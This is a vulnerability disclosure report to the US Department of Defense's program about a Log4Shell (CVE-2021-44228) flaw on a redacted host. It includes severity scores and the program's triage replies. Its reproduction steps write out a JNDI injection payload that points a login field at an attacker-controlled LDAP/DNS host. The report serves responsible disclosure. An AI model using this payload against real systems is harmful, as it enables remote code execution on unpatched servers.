Lucene search

Alex_gaynorH1:1438393

HistoryDec 31, 2021 - 12:55 a.m.

U.S. Dept Of Defense: ███ ████████ running a vulnerable log4j

2021-12-3100:55:49

alex_gaynor

hackerone.com

156

10 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

CHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

9.3 High

CVSS2

Access Vector

NETWORK

Access Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:M/Au:N/C:C/I:C/A:C

0.976 High

EPSS

Percentile

100.0%

JSON

#Report

Description:

https://vulners.com/cve/CVE-2021-44228

Impact

Probably arbitrary code execution

System Host(s)

███████

Affected Product(s) and Version(s)

CVE Numbers

CVE-2021-44228

Steps to Reproduce

Browse to https://██████████/█████████https%3A%2F%2F███%2F
Enter a ${jndi:ldap://dns-server-yoi-control/a} into the username field
Enter a random password
Submit

Observe that a request was made to your DNS server. This strongly suggests a vulnerable log4j.

Suggested Mitigation/Remediation Actions

Update log4j or disable jndi support.

#Activity Timeline

2021-12-10 18:16 (-0600) (comment)
Greetings from the Department of Defense (DoD),

Thank you for supporting the DoD Vulnerability Disclosure Program (VDP).

By submitting this report, you acknowledge understanding of, and agreement to, the DoD Vulnerability Disclosure Policy as detailed at @DeptofDefense.

The VDP Team will review your report to ensure compliance with the DoD Vulnerability Disclosure Policy. If your report is determined to be out-of-scope, it will be closed without action.

We will attempt to validate in-scope vulnerability reports and may request additional information from you if necessary. We will forward reports with validated vulnerabilities to DoD system owners for their action.

Our goal is to provide you with status updates not less than every two weeks until the reported vulnerability is resolved.

Regards,

The VDP Team

2021-12-13 08:29 (-0600): @agent-l8 (report severity updated)
null

2021-12-13 08:29 (-0600): @agent-l8 (bug triaged)
Greetings,

We have validated the vulnerability you reported and are preparing to forward this report to the affected DoD system owner for resolution.

Thank you for bringing this vulnerability to our attention!

We will endeavor to answer any questions the system owners may have regarding this report; however, there is a possibility we will need to contact you if they require more information to resolve the vulnerability.

You will receive another status update after we have confirmed your report has been resolved by the system owner. If you have any questions, please let me know.

Thanks again for supporting the DoD Vulnerability Disclosure Program.

Regards,

The VDP Team